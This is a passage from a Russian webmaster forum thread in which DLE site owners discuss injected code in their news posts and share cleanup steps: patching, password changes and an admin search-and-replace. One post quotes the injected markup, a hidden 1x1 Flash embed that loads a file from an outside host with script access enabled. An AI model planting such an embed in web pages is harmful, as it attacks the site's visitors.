оявление постороннего кода в новостях DLE

R
На сайте с 20.03.2013
Offline
20
#71

greatreklam, просто хочу уточнить для себя.

Вы поставили fix, поменяли пароли для своего пользователя БД (а еще лучше и имя пользователя), поменяли пароль администратора сайта (обратили внимание на e-mail, потому что по нему возможно восстановление пароля админа), удалили код.

И все равно взломали?

Redbaron _chaos
На сайте с 12.08.2009
Offline
667
#72

У меня после того как вчера вечером почистил, полет нормальный.

Поставил заплатку.

Поменял пароль от БД.

Очистил кеш.

Убрал код.

Кстати, взлом пароля минимальный..у меня до этого такой стоял, что замучаешься подбирать и брутить. Слишком долго, не думаю что этот способ использовали.

Кстати, вот смотрю в коде флеш плеер и т.д., может как то через использование Ютуба? У меня в каждой новости ссылка на ролик с Ютуба.

Гемблинг, беттинг, крипта на весь мир в 3snet, 1500+ офферов. ( https://clck.ru/TdZLM ) = = CPA.HOUSE - Топовая CPA сеть ( https://clck.ru/34Swci )
ProLiant
На сайте с 07.12.2005
Offline
249
#73
Redbaron_chaos:
У меня после того как вчера вечером почистил, полет нормальный.
Поставил заплатку.
Поменял пароль от БД.
Очистил кеш.
Убрал код.

Кстати, вот смотрю в коде флеш плеер и т.д., может как то через использование Ютуба? У меня в каждой новости ссылка на ролик с Ютуба.

Пока тоже все нормально, вчера утром последний раз все это проделывал - тишина.

П.с. Роликов ютуба у меня не было вообще, даже просто ссылок на них.

Выбирай оптимальный хостинг (http://cp.inferno.name/aff.php?aff=2053) для стабильного заработка на файловом трафе (https://espays.com/s.php?f=38). ;)
G
На сайте с 03.03.2008
Offline
82
#74
reso:
greatreklam, просто хочу уточнить для себя.
Вы поставили fix, поменяли пароли для своего пользователя БД (а еще лучше и имя пользователя), поменяли пароль администратора сайта (обратили внимание на e-mail, потому что по нему возможно восстановление пароля админа), удалили код.

И все равно взломали?

Да, все было поменяно, за исключением смены имени пользователя БД, менял пароль и к админке, заплатка поставлена, к утру обнаружил снова только на высоко посещаемых сайтах... Остальные до сих пор не тронул...

Redbaron _chaos
На сайте с 12.08.2009
Offline
667
#75

Кстати, у меня на сервере несколько акков..ну для удобства.

И вот на одном 2 ДЛЕ сайта, больше ни кого. Один был заражен, а второй не тронули. Видимо "перебраться" на соседние не может.

ProLiant
На сайте с 07.12.2005
Offline
249
#76
Redbaron_chaos:
Кстати, у меня на сервере несколько акков..ну для удобства.
И вот на одном 2 ДЛЕ сайта, больше ни кого. Один был заражен, а второй не тронули. Видимо "перебраться" на соседние не может.

Аналогично. При чем на одном и том же акке были сайты и на ДЛЕ 9.8 и на 10. Одни поали, другие не тронули... Сейчас пока тишина. Может злобный хакер на выходные на дачу свалил картошку копать? :)

Redbaron _chaos
На сайте с 12.08.2009
Offline
667
#77
ProLiant:
Аналогично. При чем на одном и том же акке были сайты и на ДЛЕ 9.8 и на 10. Одни поали, другие не тронули... Сейчас пока тишина. Может злобный хакер на выходные на дачу свалил картошку копать? :)

Может) У меня вообще один старой версии, даже не помню какой..9,5 что ли) Норм все с ним, с самого начала не трогают, тьфу тьфу)

Его сейчас просто обновлять, это геммор..проще новый сделать)

mesent
На сайте с 17.10.2008
Offline
115
#78

Простой способ по удалению дряни из новостей без прямого копания в базе и скриптов. В админке сайта в разделе "Поиск и замена" делаем замену object на script, а потом делаем перестроение публикаций. Все.

Просто отличный хостинг! Рекомендую всем. (https://my.adminvps.ru/aff.php?aff=097)
ProLiant
На сайте с 07.12.2005
Offline
249
#79

mesent, Хм.. Реально, это наверное проще, забыли совсем о такой возможности. Если что, надо будет попробовать. :)

M
На сайте с 09.08.2013
Offline
1
#80
mesent:
Простой способ по удалению дряни из новостей без прямого копания в базе и скриптов. В админке сайта в разделе "Поиск и замена" делаем замену object на script, а потом делаем перестроение публикаций. Все.

Спасибо за совет - действительно всё прошло на "ура".

Только пришлось пару раз делать замену: object на script, затем param name на script и embed на script. Потому как после замены object на script остается код вида:

<param name="movie" value="http://webmasters-yandex.ru/flash.swf?437160373"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?1024826446" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>

После данных замен сделал перестроение публикаций - как результат, чистые новости.

Еще раз спасибо.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий